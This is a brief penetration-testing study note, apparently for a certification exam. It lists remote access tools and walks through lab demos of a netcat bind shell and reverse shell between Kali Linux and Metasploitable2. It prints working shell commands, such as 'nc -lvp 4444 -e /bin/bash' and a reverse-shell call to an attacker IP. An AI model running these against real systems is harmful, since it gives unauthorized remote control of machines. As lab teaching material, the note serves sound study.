Penetration Test

Remote Access Tools

Tool Notes URL
SSH Secure shell Included or available in most OSs
NCAT Similar to nc, but from Nmap developers https://nmap.org/ncat/
NETCAT Same as nc Included or available in most OSs
Proxychains Forces TCP connections through a proxy https://github.com/haad/proxuchains
DEMO 1

Blind shell

Attacker: Kali Linux Target: Metasploitable2

Run the following commands on Target VM.

nc -lvp 4444 -e /bin/bash

image-20201117201308500

Then Run the following commands on Attacker VM.

nc 10.0.0.21 4444

image-20201117201347921

image-20201117201427083

DEMO 2

Reverse shell

Attacker: Kali Linux Target: Metasploitable2

Run the following commands on Attacker VM.

nc -lvp 4444

image-20201117202158176

Then Run the following commands on Target VM.

nc 10.0.0.18 4444 -e /bin/bash

image-20201117202239998

image-20201117202319728

QUICK REVIEW
  • There are multiple ways to leverage remote connections
  • The PenTests exam focuses on command-line tools for remote access
  • Remote access is often followed by privilege escalation attacks and/or preceded by credential attacks
相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/keepmoving1113/p/13996281.html